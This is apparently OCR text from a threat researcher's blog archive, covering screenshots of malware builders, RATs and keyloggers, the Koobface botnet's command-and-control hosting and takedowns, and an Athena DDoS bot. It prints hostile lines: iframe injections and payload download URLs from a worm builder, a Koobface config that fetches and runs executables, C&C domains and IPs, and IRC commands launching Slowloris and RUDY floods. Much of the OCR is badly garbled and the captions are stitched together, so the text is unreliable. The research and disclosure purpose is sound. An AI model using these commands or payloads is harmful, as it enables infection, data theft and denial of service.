CAT-QuickHeal 
Cloma¥ 
Deveb 

eSate 
eTrust-Vet 
Ewido 
P-Prot 
F-Secure 
Fortinet 
Gata 
ixerus 
KvaAntiVirus 
Kespersky 
McAfee 
Microsoft 
HODS2 
Norzan 
Ponda 
Prevx 
Rising 
SecureVeb- 
Gatevay 
Sophos 
Sunbelt 
Synantec 
TheHacker 
TrendNicro 
VBA32 
ViRobot 
VirusBuster 


2008.13. 7.2 
7.9.0.26 
5.1.0.4 
4.3.1248.0 
8.0.0.162 
7.2 

9.50 

0.94.1 

4. 44.0.09170 
7.0.17.0 
31.6.6200 
4.0 

4.4.4. 56 
$.0.14332.0 
3.117.0.0 
19 
T3.2.1,45.0 
7.10.820 
7.0.0.125 
5428 

1.4104 

3597 
$.30.02 
9.0.0.4 

v2 
21.02.62.00 


6.7.6 


4.35.0 
3.1.1785.2 

10 

6.3.1.1.146 
8.700. 0.1004 
3.12.8.9 
2008.11. 7.1457 
4.$.11.9 


2008.21.09 
2008.11.07 
2008.11.09 
2008.11.08 
2008.11.09 
2008. 31.09 
2008.11.08 
2008.11.09 
2008.11.09 
2008.11.09 
2008.11.09 
2008.21.09 
2008.11.08 
2008.11.09 
2008.11.09 
2008.11.09 
2008.22.09 
2008. 11.08 
2008.21.09 
2008.11.08 
2008.11.09 
2008.11.08 
2008.22.07 
2008.11.09 
2008.11.09 
2008.11.09 


2008.11.09 


2006.11.09 
2008.22.08 
2008.11.09 
2008. 11.08 
2008.11.07 
2008.11.09 
2008.11.07 
2008.22.09 


BDS/Poisonivy.£.3 

32 /Agent.G. gen ‘Eldorado 

Wain32: Agent-acIz 

Dropper. Delf.BOC 

Trojan. Agent#®. Dell, FxH6S01824 
Trojan. Downlonder-24465 
BackDoor. Poison.61 

W32 /Agent. 6. gen Eldorado 
Trojan. Agent®. Delf. FRIH6S01824 
Backdoor. ¥in32.Poison.pg 
BackDoor-DKI.gen.a 


& Variant of Vin32/Poison 


Suspicious file 


Trojan. W¥in32.Snall.eno 
Trojan. Backdoor. Poison. CPD 


Troj/Snalla-Gen 


BEDR_POISOM. FM 


Trojan.DL.Agent.XGB 
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i | cv 
SynMsn Pass... (C= JST ee 


FTP Setting's 


Load Server : [path nae | 


eae Ht Synsecurity.net 


FTP User: |DarkCoderSc 
FTP Pass ; frei 


Upload File Name : [Logs.sys 
Save | 
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[493] 


Pages: [i] Bd 5 6 2 BB fio (aa) (223) ina fs (2 17] [28] fig 20) (2) 22) 23) Results 0 - 50 of about 1168 


iS 5.0 MOD 
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| Remote Server Managment: 
| @ Remeote 5.Mana... | | Ready 


& Name ; My Host 


& Path: Ci WINDOW ci 
@ Version : I'm Server ¥ S$ Get Informations 


BA No-Ip ; iQ) Close Server 


@P b- 31OC 
e¢ Port: 2185 


SS Rename Server 


a} Suto Run: NO 
“J Offline Keylogger : no 


24360 


IP Scanner [x] 


ix 
End Address: 
{127.0.0.255 
Delay: Time Out: 
[15 3000 
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 TinyIRC - lavoe.euyulio.net (fopensc) E =) x| 


Server Channel 


Server |daiev. servebeer.com Connect | Channel |Hopensc 


Port [e667 ee | Part | 
Nick Alt Nick |LttCoder |LttFal Quit | 


** Connecting to dajev.servebeer.com port 6667 

** Connected 

‘+ LttCoder :Welcome to the EUYULIO IRC Network LttCoderlusername@1 _ J._° 20° “t.n 
:- LttCoder :‘Your host is lavoe. euyulio.net, running version Unreal3.2-betal ? 

:- LttCoder : This server was created Sat Jun 21 2003 at 04:52:17 EDT 

:- LttCoder lavoe. euyulio.net Unreal3.2-betal 7 “2, ghr-* -C SVE INCy “oP vdk"Gp 

Who at......--JOALObSe. VIMGCu_. ! 

:- There are 39 users and 25 invisible on 6 servers 


1 
21 
:- | have 44 clients and 2 servers 

*e* 492 LttCoder :-MOTD File is missing 
** Ko current channel 


** Joined channel Hopensc 

:- Hopense :@LttCoder 

:- Hopense :End of ‘NAMES list. 

:- LttCoder Hopense 1075483773 
[Hopensc] <LttCoder> yo 

[Hopensc] <LttCoder> RIP ME 

[Hopensc] <LttCoder> OPENSC.CJB.NET 
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Ponon by - [Letereng on PodfEK connection: 31) 


[498] 


/ Form1 


| AM BEING LOGGED AND THE LOG WILL BE SAVED INTO 
SAVE.TXT every 2 minutes 


Please rip my source 
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#We expeess cur high gratinude to Dancho Danchev (lamp: ‘ddanchev blogspot com) #foe the help in bug Gung, researc! ches and docemcetaton Sex eur software 
PERMANENTLIST)150.145.$.115:94.134.177.44/71.204.112.12291.201.133.149(76.105.76.135)99.141.36.158/24.93.111._3294.$2.220.99:98.148 206.5298. 122.34.208/76.190.207.243/72.129.176.2: 
*nopesen #PID=6145 START hap) web reg md 1/6244 exe START Rtp web seg snd inf exe STARTONCEAttp web reg d/l pp. 10. j exe WAITIOO STARTONCEAay web seg md/1 fb. $0.exe 
STARTONCEIMGetp: img] 19 nageshack us mg] 19/1 16)p22157446 jog 19385473099 I aigdifng3 45 HBLACKLABEL EXIT 


Especially now that it’s apparent we know each other’s names. A recent Koobface update 
includes the following message: (thanks to TrendMicro for pinging me) : 


We express our high gratitude to Dancho Danchev (http://ddanchev. blogspot.com) 
for the help in bug fixing, researches and documentation for our software. 


Zwartekobus: My home video :) http://filipicsr biz4youtube/ 


> 
SELES Pmilgmyas ~ Reply - View Tweet 


6 days from web- Reply - View Tweet 


ae nilufer_yuce: My home video :) http:/filipicsr.biz/youtube/ 


6 days ago from web- Reply - View Tweet 


Kellie Mascadri: My home video :) http:/filipicsr.biz/youtube/ 
’ 


The ROI of several abuse notices during the weekend, quick response from [5]China’s CERT 
which took care of 61.235.117.71 (thanks Patrick!), and Oc3 Networks & Web Solutions Llc 
abuse team which took care of the Koobface activity at 98.143.159.138 - cgpay-re-230609 

2439 


r etBot Attac = x ) 
sr =|5) x! 3 
— >? ss 
— _ . 

er - > i Ara Kiasteter if) EH by ad 
[ = = = 7 
Adres 1) C:\Documents and Settings \TEST Desktop etBot_Attacher 1.4 _EngishiNetBot Attacker 1.4 English >) a 


al 


ae 


4 PE Explorer - C:\Docurnents and Settings\ TEST\ Desktop \NetBot Attacker 
Fle Yew Joos Heb 


loon Entry 

Meru 

Dialog Pl 
. Siew 
. Group Curtor 
. Group Icon 

Verteor 

Too a 


For Help. press F1 


2 Bastat | i 3 ie} a NetBok_Attacher 1.4 Eng | & Pt Explorer - C\Docu, « a 
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ex C:\Documents and Settings\SandboxWesktop\leaktest.exe 
AFR LeakTest by Aphex 


phex@iamaphex.net 
http://www. iamaphex.net 


Scanning for user mode hooks... 

No user mode hooks found? 

Scanning for kernel mode hooks... 
KeServiceDescriptorTable 86559B88 


KeServiceDescriptorTable .ServiceTable 8G4E2D26 
KeServiceDescriptorTable .ServiceLimit 284 


nhooking ZwAllocateVirtualMenory... 
i ZwCreateThread... 
ZwMhapViewOfSection... 
ZuProtectUirtualMemory... 
ZwShutdownSystem... 
ZulerminateProcess... 
Inhooking ZwWriteVirtualMenory. .. 


Injecting... 


Finished? 
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24364 


pMouse 
et Wallpaper 


Nombre completo del arch 


LocalIP: 10.0.0,2 20:52:05 


Direct Connection [LAN] 


eee 1 27.0.0.1 Port : iis 


Connect ! 


Flemaie Agninsiavan Faaf 


Disclaimer - 

This Program is for educational 
purposes only. The Author will not 
be responsible for the damage caused 
through this program. 


Use at your own Risk ! 


FProgrammed Bg - ®&. ¥ivek 
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! Mantice vs 1.0 e} 
SSS] 


emcee | | ccc | | ce | 
P Close A MoritorOn 


Show loons 


Update KeyS py 


[504] 
la — 
Multi MD5 Online Cracker v0.1 Joleg 
Supported MD5 Online Cracker Unctacked MD5 Hash{es} 

A miwOim.com ine MD5 Hash Status tad 

Y gdataoniine.com Gy d189e9e55HBde7a6eIHIe2e5III5ec6 Cracked 

v pore eee @ 8170c32bd007be107371c9e1d4797619 Cracking... (hashreverse.com) 

crysm.net @ de77a3a4460908382c3a66c5617abeSa Cracking... (hashreverse.com) 

¥ tednoize.com @ 1f5fa9d27c0417105428d2712cb3a5b3 Cracking... (hashreverse.com) 

_ eri ait 580d7(96031 ee6be7334150f2S9e1e30b Cracking... (hashreverse.com) 

% cryptobitch.de 64743 1bScadSbO4idiSe2iceHef1915 Cracked 
1S9a0GebbS6S0ebbb397e11e9528155¥a Cracking... (mdSdeciypter.com) 
cb0Gels7f36363e4614563302Idd57c0 = Cracked 

& 00e45749508fe15calaf3397eab8db78 = Cracking... (miwlim.com) v 
Cracked MDS Hash(es} 
M5 Hash PlainT ext a 
selina elQadc394Sba5dabbeSGe057I20G83e 123456 
Theeads: 7 4) Timeout 39 + 
¥ ¥ el0ade3949baSSabbeSheN57120f883e 123456 
Save Hashlists [¥] Autoscroll 570a90bibiSc7eabSdcSd4e26832d51 fred 
eeal46Si2852370e28bblaSc2761085  Tauchen 
71b475cbc823152chh2e8sel5tcl3edi bender 
Working... 72 of 30085 Hash(es) done (0%) 
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24365 


MarjinZ Local Keylogger 1.0 
Installation 


Filename : Log Name : 
Install Path: @) System Dir | | Startup: kz, 


(©) Windows Dir 


Other 


Save log every: sec | | Encrypt Log 


J Hide file Password : 
|| Try to hide process [winXP] 
|_| Delete System Restore Points 


|| Melt on execution 


Decrypt log 


Mouse Emulation ... (-) (x) 


Click on the label and drag your mouse to any 
point on the screen. Release your mouse and 
you will see the screen coordinates of where F 
you feleased your mouse. 


(669,360) 


; Select Action to Emulate 
(Left mouse click 


( Left double click 


.* Right mouse click 
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ficdainet re J ace 


| Extra About 


Server 


Host List 


ES 


Die in a Firel! 


Status : Connecting... 


[508] _—s 
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© RealPla... f\ mesnot... |e Delphi 6 {* Msnnot... 
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CELE) © URNA Somes Ce 


asa 
aa” 
mm @a* 


3G LES 
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LI 


| > 
Read Put Erase Load Save 

Message | Message} Message Picture Picture 

E3 Send Picture | 
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Plsie 
File: liz 
—Options — Test 


(CO Debugger detection (autoclose if present) 


(Re check fautoclose if Failed) 
0 Erase Import Information 
Dar! Redirect 
C0 anti Dumping 
(I Glear PE header 


Total Humans/Bots 1 


Prise DP Cestreten 
DiD2I7AS A 292. 168.0. 
2O9.85.229.003 192. 168.0.10 
2O985,229, 103 192. 168.0, 10 
209.85.229.103 192. 168.010 
DIDI 192. 168.020 
62.212. 28 192. 168.0. 10 
62.212 192, 168.0,.10 
62.212. M28 292. 168.0. 10 
62.212. 28 192. 168.0, 10 
2O9.85.229.003 197. 168.0.10 
6554109223 | 192. 168.010 


ape Se ee’ es 
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Pinch Builder (C) Coban Eel) 
File Help i 


| Decrypt | 
SMTP | HTTP | FILE | 
SMTP Propettie: 


Caner [194.67.23.10 7 Resolve | Port: [25 = 
From: |coban2k@mail.ru — 
To: coban2k@mail.ru = 
Interval [50 = Send test message | 


Compiler Optio 
¥ ICQ99b-2002a IV ICQ 2003a/Lite IV Miranda-icq 


\V The Bat! [¥ Outlook V Trilian ICO/AIM 
JV IE autocomplete & protected sites & ftp IV Self-delete 

Jv FAR (FTP) IV Win/Total Commander [¥ System info 

IV &RAQ IV RAS IV Act as Trojan 
lV Pack using FSG 1.33 [~ Key-log f Console 


[Addleon [CMuniconico = 


Protocol Ce 
@ SMTP ¢ HTTP © FILE Compile | 


IP Address 
Start Port 
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24372 


> Process Viewer 
File Process View Help 


a Full Path Name 


“ ' 


~ Ig 


es) [System Process] 0000 0000 0000 [system process] 
PP latizevxx «exe 0304 0000 0000 ati2evxx.exe 
PJatiptaxx exe 0184 0000 0000 atiptaxx.exe 
E}evecc.exe 0660 0000 0000 avpcc.exe 
aa TT | >| 
| Module 1D 
@procview “exe e:\jee-van\homepageppensource_s... 0001 0978 

(2) ntdll.dil e:\windows\system32\ntdll.dll 0001 0978 

(2) kernel32.cll e:\windows\system32\kernel32.dll 0001 0978 
(@)user32.dl e:\windows\system32\user 32.dll 0001 0978 

(3) GDI32.dll e:\windows\system32\gdi32.dll 0001 0978 

cS) ADVAPI32.dll e:\windows\system32\advapi32.dll 0001 0978 

|S) RPCRT4.dll e:\windows\system32\ypert4.dil 0001 0978 

(9) oleaut32.dl e:\windows\system32\oleaut32.dll 0001 0978 
()MSVCRT.DLL e:\windows\system32\msvcrt.dll 0001 0978 

(2) OLE32.DLL e:\windows\system32\ole32.dll 0001 0978 

(24) version dll e:\windows\system32\version.dll 0001 0978 

(3) comctl32.dll e:\windows\system32\comct32.dll 0001 0978 

(3) shell32.dll e:\windows\system32\shell32.dll 0001 0978 

(23) SHLWAPI.dl e:\windows\system32\shiwapi.dl 0001 0978 

(23) comctl32.dl e:\windows \winsxs\x86_microsoft.w... 0001 0978 

(8) uxtheme dill e:\windows\system32\uxtheme.dil 0001 0978 
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a 


.com still responds to the IP - looks pretty positive and managed to increase the opportunity 
cost for the Koobface gang since it caused them some troubles during the weekend. 


With [6]Koobface worm’s Twitter campaign currently in a stand by mode due to the pub- 
licity it attracted, as well as the fact that the central redirection points used in the campaign 


are down, let’s assess the current Koobface hosting infrastructure, with an emphasis on 
[7] UKSERVERS-MNT (AS42831) which stopped responding to abuse notifications as of Sunday. 


* r-d-cgpay-090709.com 
supemerd.org 


upr0306.com 78.110.160.0/20 ——“S-ge as42831 


www.r-d-cgpay-090709.com 


Zaebalinax.com 


How did the Koobface gang/fan club responded to the downtime anyway? By introducing 
several new domains, and parking them at 78.110.175.15 - [BJUKSERVERS-MNT (AS42831), 
whose abuse department remains unreachable ever since. 
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Prosiak v 0.70 beta 6 client [not connected] | x 


Prosiak  Portezeni S| Okna Plik S2tuczki 1 Sztuczki 2 Rejestr Ekran 
Klawisze Skrypt MS Network Sie | Inne | 


Skaner sieci 


eck ————_— 
IP sieci od do port 


Start | [100.100.100 fi [254 [aaaae = 


Numer IP = 


Port [aaaaa 
Havo i | 


Portcz | Uaktualnij | 


Informacje o serwerz 
Wersja si ------- 
Ugytkownik ~—-------- 
NazwaDNS _~ .-------- 
Czas pracy ——-------- 
Adres IP —_—si-------- 


Identyfikator = -------- 
WersjaOS ~~ -------- 
Rozdzielczole -------- 


$5) u| x 
Pamiee =~ -------- . 
Ping[ms] _~__-------- Ping _| Zapisz... | Weazyptaj... | Wyczysc | 
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Feature set 


'V Infection Page <iframe src=http://www. hackju. en/123. htm width=0 
Infected file format: html, HTML htm,HT M.asp.aspx.php,jsp Is not infected with C disk 


V\ ARP spread <iframe src=http://www. hackju. en/123. htm width=0 
ARPDeception: To deceive the IP segment "2." "255 


\V QQ MSNiNewsspreac Yesterday I saw a dinosaur, to see, http://www. 4 
GOMSN, the message tail: program runs each time you run, each friend will be sent once / name of the judge 


(V) Traffic Statistics http://www. hackju. en/ct. asp 
Traffic statistics: Please use this program's own statistics ASP file 


Advanced Options==== 
(V\ Close antivirus (V| Close antivirus-Keyword \V/Remove Ghost [V|Changes Host VJ U disk infection 


(Vilmunune anti-virus (|W Intranet Communication \V RAR file is not infected with C disk infection 


() 135.14334.utomatic transmission |_| Intelligent load-driven recovery SSDT |_| Image hijacking ( BT ) 
Download 
V) File DownloadAddress . Can fillin TXT and EXE format. 
1: http://www. hackju, en/1. exe 9: atp.exe Download Address 
http://www. hackju. en/2. exe http://www. hackju. cn/ arp. exe 
http://www. hackju. en/3. exe arp.exe is the spread of infected files ARP LAN 
is not a back door ... 


http://www. hackju. en/4. exe 
http://www. hackju. en/S. exe 
http: //wwe. hackju. en/6. exe 
http://www. hackju. en/7. exe 


10: wincap.exe Download Address 


http://www. hackju. cn/wincap. exe 
wincap.exe is used for network packets to crawl 


http://www. hackju, en/8. exe 8 set of tools. | $P 1344 143 for the port, ... the 
spread of infection Trojan files 


ao na mo on => Ww Nm 
- ee 86 oe oe .. * 


Worm http://www. hackju. en/11_ exe 
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amce f dent use fo save anvthing . there’s 
nothing te show - raters --} 
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RAS Passwords Created by -: the SPHINX :- 


RAS DETAILS 
HERE BUTI AM 
ON XP SOIT 
WONT WORK 
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‘EB. SynPad < Text Editor 2.0 > 


DaeeaS --¢40H* AR AR & v@ = al 


OxB4, OxBS, Ox08, Ox00, Ox2B, Ox2F, OxE1, 0x62} 


Directory entry id structure 


This entryid is permanent. 

“f 
60 #ifdef TEMPLATE _LCID 
51 typedef UNALIGNED struct dir _entryid 
52 Helse 
6 typedef struct dir entryid 
64 Hendif 
55 { 
$6 BYTE abF lags[4): 
5? MAPIUID muid; 
58 ULONG ulVersion; 
$9 ULONG ulType: 
60 } DIR_ENTRYID, FAR * LPDIR_ENTRYID; 


#define CBDIR_ENTRYID sizeof (DIR_ENTRYID) 


04 /* 
6 * Mail user entry id structure 


This entryid is ephemeral. 


Line: 14 CPU Usage:0 
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|Welcome to Che Uploader 
Version: Beta 1 
http: / /wwr. opensc . ws 
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Display Name Service Name Status 


Avertissement Alerter Stopped 
Service de la passerelle de la couche 4p... ALG Started 
ANIWZCSd Service ANIWZCSdService Stopped 
Apple Mobile Device Apple Mobile Device Started 
Gestion d'applications AppMamt Stopped 
Audio Windows AudioSry Started 
é de transfert intelligent en arriére... We Stopped 
##Id_String!.6844F930_1€#%, List Services Started 
Explorateur d'ordinateur Started 
Service d'indexation >) Start Services Stopped 
Gestionnaire de |'Album 11) Stop Services Stopped 
Application systeme COM+ P Stopped 
Services de cryptographie % Unistall Services 
Lanceur de processus serve 
Client DHCP = j 
Service d'administration du 1 Robe Pape 
Gestionnaire de disque logig. Clear Services List 
Client DNS Ps 


@ Close Services Manager 


at: [15422 1 GIN Part: [51994 | ("af eT APItictanina | | GSandBox: 
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D4 http://unremote.org/update.exe 
Save : c \update.exe 


sda ale ok casi 


Mass Uninstaller 


mi] OAservers  @ selected ony [[Exeaite Task) 
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“W SynSpy 0.1 Private LX 


eae 
4% Connexion Setting's 
@ StartUp Setting's Registry StartUp 
oY FTP Test Using Registry StartUp 
Read Log's 


os) Create Server 
© About Installation Path ; C:\\Windows\System\Server.exe 


Key Name: Msnmsgs 


Services StartUp ( PowerFull } 
Computer Info 
Service Name: MyService 

Display Name: SynSecurity 


Installation Path : C:\Windows\System\Server.exe 
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binder 


d Run-time error '339'; 


Component ‘Codejock. Controls.v12.0,1,0cx' or one of its dependencies not correctly registered: a file is missing or 
invalid 
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& File Cloner 2.0 


Select a file to clone information to: 


Select a File to clone information from: 


Save Icon Developers: 


: - abhe 
Clone Yersion Information - steve10120 


- counterstrikewi 


Clone File Size 


5 www. delphi.co.nr 
Build Clone www, hackhound.org 
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Ow - OF Pow Bom F- 


| Indice (> Cr\ooouments and Setcngsipelerotorenbeslbogibeutroc 1.1 betakent 


&-3-@? YEe 


2 


per i Lusi messaggi bebe! GRATIS! 
Sep Up | coon si Conquistane ad eg passo fal : : ed oa aE ‘ 


Utne meeggo rereto ae ZL dd, ZA 
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i Secret Service ¥1.0b Public Edition 


Send Menu 
fa RAS /Dial-up Passwords 
fa Cached Passwords 
fl MSN Passwords 
fa URL History 


fy CD-Keys 
fa General Computer Info 


Bind/Icon 
fa KeyLogger 


Get Word Search 


Secret Service v1.0 by drkdreams // Shouts to: The Black Death, unreachableboy and Psyc 
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cinet Conmemon au fUseau local 
Statut du mUdia Mudia dUconnectU 
cinet Conmeson tUseau sams f 


Sudfice DNS propre O la connexion 
Adresse P. a 192. 168.0.10 
Masque de sous-rUseau . . a 

Passerelle par dUfaut 192. 168.0.1 


Conneeons actwes 


Proto Adresse locale 
TCP 127.0.0.1:2 127.0.0. 
> 127.00 a 127.0.0. 
127.0.0 6 127,0,0,1-51234 TIME_WAIT 


127,0.0 127.0.0,1:15432 APA ISHED 

127.0.0.1:15432 127.0.0.1:2064 ESTABLISHED 

192. 168.0.10;1191 207.46.110.66;1863 ESTABLIS 

192.16 1651 150:50603 ESTABL 
18S? ' 


192. 168.0 


i 1:49263 ESTA 
192.168 2056 


dresse IP doit étre spéciiee 


Envoi d'une requéte ‘ping’ sur www Lgoogle.c 104} avec 32 octets de données 


orse de 209 9,104: octets nps= 16 ms TTL 
se de 209.85.129. 104: octets yps= 16 ms TTL 
ponse de 209.85.129, 104: octets=32 termps= 16 ms TTL 
e de 209 9,104: octets sps= 15 ms TT 


Statistiques Ping po 

Paquets = erwoyés cus dus = 0 (perte 0%) 
Durte approximative des boucles en mallnecondes 

M 


imum = lSens, Maanmumn « léens, Moyenne « iSms 
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[534] 


™ 


Py 


Destination Data wd 


IP/Hostname | Pout Cc iz bytes 


Transmission cortrol 


Max duration [secs] Max packets [[infinite] © From file 
min 
Speed (pkts/sec) Status 


Modem -=>-- Cable -=>- 11 -=>-= LAN Seconds elapsed 1.702 Stop About 
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AS64523 sf AS6908 
GLOBEINTERNET Pi - DATAHOP 


AS30326 AS42831 
GOSCOMB-AS UKSERVERS-AS 
AS16150 
PORTS0-GLOBALTRANSIT 


AS9009 
GBKS.AS 


Following the first abuse notice sent to UKSERVERS-MNT the company temporarily closed the 
account (78.110.175.15) of the "customer", then brought it back online. Asked why, they 
responded that the "customer" claimed he’s been compromised and that he needs to clean up 
the mess and secure the server. In reality that means "give us some time to smoothly update 
DNS records and migrate operations now that all of our command and control locations are 
offline". 


Since they presumed | don’t take lying personally, half an hour later | checked again 


and the Koobface command and control servers were operational again. The company 
forwarded the responsibility to the customer and said they closed down the account. 


2441 


_ am co a a 
4aqate_imqga 
Bilginin Sinilarim: Zorlayin 


Icon Settings 


PP Find Icon V Default Icon G Icon Hunter 


Filename Size 
(2} C:\WINDOWS\Desktop\Yeni Metin Belgesi.txt 3 Kb 
in’ C:A\WINDOWS‘Desktop\untitled-1 copy.ipg 225 Kb 
in C:AWINDOWS \Desktop\DSCI021 4.JPG 442 Kb 


s C:AWINDOWS‘\Desktop\trol.rar 45 Kb 


bel Create File About Program 4 Close Program 


binded.exe was sucessfully created 
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TUNRAT 


ow 


V2 >< 


[+ @. Fun 
(@) S Fites 
() in communication 
pc 
(+) > Graphics & Sounds 
\ Server Seeting 
+ Extra 
‘| About & Contact 


I 
Lost Door ® 


Copynght © 2007-2008 'S) 


Ri Wiedows_NT standard (© 0255:02 @ 127001 | France 


Connection Status : | Online Victims: 1] 
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BADLL Injection. 
DLL Name : | 


c:\windows\system32\rundll32. dil 


| | About | Create __| 
Status ; Waiting Instruction... 
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a ¥ Toolbar 
Prot 


-— v Status Bar 


| RemoteAddress | State 
Sie ina ane Ctrl+m 0.0.0.0: 0 LISTENING 
7 ¥ Al Endpoints Ctr, 0.0.0.0: 0 LISTENING 
ce v As System Tray Icon Ctrl+I 0.0.0.0:0 LISTENING 
0.0.0.0: 0 LISTENING 
Ore Tus 0.0.0.0: 0 LISTENING 
Itt-wonder: 1036 0.0.0.0: 0 LISTENING 
Itt-wonder: 1198 0.0.0.0: 0 LISTENING 
Itt-wonder: 0.0.0.0: 0 LISTENING 
Itt-wonder: 8086 0.0.0.0: 0 LISTENING 
Itt-wonder * 0.0.0.0: 0 LISTENING 
Itt-wonder: 1032 baym-cs175.msqgr.hotmail.c... ESTABLISHED 
Itt-wonder: Pe tee 
Itt-wonder: . : Lo td 
Itt-wonder: is ...... at tnd 
Itt-wonder: 1026 See 
Itt-wonder: 1034 ics 
Itt-wonder: 1039 phe then 
Itt-wonder: 1121 hha 
Itt-wonder: 8087 REA 
Itt-wonder: discard a sas 
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|} -@ Server Informations 
QC) Trace Route Server 


[541] 


M@@ ExString - Encrypt/Decrypt string 


Encryption Method [Blowfish x) Passphrase f= 


PlainT ext CipherT ext (Base64 Encoded) PlainT ext 


Opensc.ws rules :P kKa80DwO0/asSqsilzJmoewG2VZP  |Opensc.ws rules :P 
VeWwD 


Encrypt | 
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02.00.00 — 
— TronScanner 


Commect Qisconnect 


{ Fite Transter } 


Upload 


{ Remote typing mode } 


Open CD-ROM Show pic 


Shut Down Play wav 
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r ] 
8 i) 
4A OpenScRAT | 127.0.0.2jAydin | 1270.01] L0t x) 
. 
. &¢ ff 8 dye 
FileManager RegistryManager ServiceManager ProcessManager Screen Cam Keyfogger 
Managers Spy 
x 
Matus: OpenScRAT listening on Port 1414 
Computername 
LOL 
Ayan 
‘ , 


24387 


Ke siWebcam Streamer: (ese) 


WebCam Streamer 
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WepKeys Decrypter x] 
WepKeys | About 


v 
f 
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™ web cleaned 


File Eck View Favortes Tools Help 
Gu: OF Psa Prac H- 
Adxess (CQ Clcempplhitdecs|1242\web_deaned 


File and Folder Tasks 


ED Maske 2 new Folder 
@ Prbish this foider to the 
Web 


fad Share this folder 
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http:/Mocalhost/1 24 2iweb_cleaned/ - Windows Internet Explorer 


Ge- (2) rtp: (Mecano /1242/web_ceaned/nstaliiedex.pho SS) | $9) |< Pye 


Be BE E)iitpfocahosts1242}web_deanedy ED BG = pPage © took - 


0% of index.php from localhost Completed 


e a 


Windows Internet Explorer 


te Internet Explorer cannot download index.php from localhost. 
Inkernet Explorer was rot able to open this Internet ste. The requested site is ether unavatatie or cannct be 


found, Please try apain later, 
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Stay tuned! 
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2. https ://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEhzZ-XEgSTS7-Z564xgD9L2j3 JONBRsgOPqdORaKK tatErG4 
3, httpe://blogger googleuser content. con/ ing/b/26v22n1/AVvKeE] LepHF OOSHUsEP 4ohDhY pF TRRCT© 6S JESX4dB-aE-OLVE 
4. https //blogger.goog]euser content .con/ing/+/R29v22x1/AVWKsEgflSnnl 15 JaxAKVANanat It jWPOKsvOayOA7dnoyi-¥_2 
5. hteps:/ blogger googleusercontent.con/ing//R29v22x1 /AVWRsE jst aWDoGVK2 TsavéaGOPLEaskQSxangINt_1A POPyvsL 
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VnNuN8g7vx1C9HSgpsriddCBBHyf1Ij_uJSshU22Z6kxj28zz1lvw0 
0. 
eAgyUkHmKzkhef 2CrmOv6nNDNZOVBFqtkf 1hY jHIHR9OYbD4zZETpSG1DB 
11. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgTFvx5gkvttgLAxhKO1lnEgktDWCbt04TwDfzYN3hTEJO j 
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Uprtrisnest, 
However, what the Koobface gang did was to register a new domain and use it as Koob- 
face C &C again parked at the same IP, which remains active - zaebalinax .com Email: 
krotreal@gmail.com - 78.110.175.15 - in particular zaebalinax .com/the/?pid=14010 which is 
redirecting to the Koobface botnet. Two more domains were also registered and parked there, 
ul5jul .com and umidsummer .com - Email: 2009polevandrey@mail.ru which remain in stand 
by mode at least for the time being. 


Upon execution the Koobface binary phones back to upr0306 .com/achcheck.php; upr0306 
.com/Id/gen.php (78.110.175.15) and attempts to download upload.octopus-multimedia 
.be/1/pdrv.exe; upload.octopus-multimedia .be/1/pp.10.exe. 


UKSERVERS-MNT (AS42831) is also known with its connections to gumblar.cn malware 
campaigns, as well as having hosted a domain (supernerd.org) part of a [9]Photobucket 
malvertising campaign. 


Related posts: 

[10]Dissecting Koobface Worm’s Twitter Campaign 
[11]Dissecting the Koobface Worm’s December Campaign 
[12]Dissecting the Latest Koobface Facebook Campaign 
[13]The Koobface Gang Mixing Social Engineering Vectors 


This post has been reproduced from [14]Dancho Danchev’s blog. 
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3. bttp://www.virustotal.com/analisis/cd9706c08442a239e5568£d18d97 3dabbf d51a997329a5c9eda3cb1c2ac0fb92- 1248 
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5.7.10 Koobface - Come Out, Come Out, Wherever You Are (2009-07-22 11:09) 


UPDATE2: New binaries are hosted at web.reg .md/1/[1]pdrv.exe; web.reg 
.md/1/[2]pp.10.exe and at web.reg .md/1/[3]fb.49.exe. 


UPDATE: The Koobface gang is [4]upgrading the command and control infrastructure in 
response to the positive ROI out of the takedown activities. This of course doesn’t mean that 
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enough evidence on "who’s who" behind Koobface and a huge percentage of the currently 
active malware campaigns targeting Web 2.0 properties hasn’t been gathered already. 


#We expeess cur high gratinde to Dancho Danchev (temp: \ddanchev blogspot.com) *foe the help in bug fhung, researches and documeszation for cur software. 

PERMANENTLIST)150.145.5.115)94.134.177 44/71 204.112. 1232:91.201.133.149(76. 105.76. 135)99.141.36.158/24.93.111.32:94.52.220. 9998. 148. 206.$298.122.34.208/76.190 207 343)72.129.176.2 
*nopesem #PID=6144 START Rtp) web seg md 1/6244 exe START Retpy wed reg end I int exe STARTONCE. tp: web reg endl pp. 10.exe WAITIOO STARTONCE herp: web seg endl th $0. exe 
STARTONCEIMG ety ‘ang! 19 amageshack us ‘gmg] 19/116) p22157446 og 19585473089 Figen 345 *BLACKLABEL EXIT 


Especially now that it’s apparent we know each other’s names. A recent Koobface update 
includes the following message: (thanks to TrendMicro for pinging me) : 


We express our high gratitude to Dancho Danchev (http://ddanchev.blogspot.com) 
for the help in bug fixing, researches and documentation for our software. 
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18.8 August 


18.8.1 In Retrospective - A New Anthena DDoS Bot Spotted in the Wild - An OSINT 


Analysis (2022-08-02 07:54) 


I’ve decided to resume posting posts part of my upcoming blog post series called "In Retro- 
spective" where my aim is to share interesting findings from across the cybercrime ecosystem 
in the context of new malicious software releases and various other cybercrime ecosystem 
underground market propositions with the idea to offer a unique peek inside today’s modern 


cybercrime ecosystem. 


Case in point is the Anthena DDoS bot which as a variety of unique features and should be 
considered a quite recent release in the context of having users buy it and actually use it to 


build botnets and launch new DDoS attacks against their victims. 


Sample screenshot of the malicious software in action: 


[1] 


[2] 


<@Root> tid 

<#Steve00S83> ||-=Athena v1 .8.3=- || License HITML IL IP. 127.0.0.1 IL Locoation: ¢:\Temp\wWindowsExp Il 
<@Root> Islowloris dd. zeroxcode.net 80 10 

<+Steve00583> Started: Slowloris flood on dd.zeroxcode.net:80 for 10 seconds 
<+Steve00583> Stopped: Finished flood on dd.zeroxcode.net:80 after 10 seconds 
<@Root> thttppost dd.zeroxcode.net 80 10 

<#Steve00S33> Started: Rapid HTTP Post flood on dd.zeroxcode.net:80 for 10 seconds 
<#Steve00533> Stopped: Finished flood on dd. zeroxcode.net:80 after 10 seconds 
<@Root> !ping 

<+Steve00583> PING Time Oms 

<@Root> trudy dd.zeroxcode.net 80 10 

<#SteveQ0583> Started: RUDY flood on dd.zeroxcode.net:80 for 10 seconds 
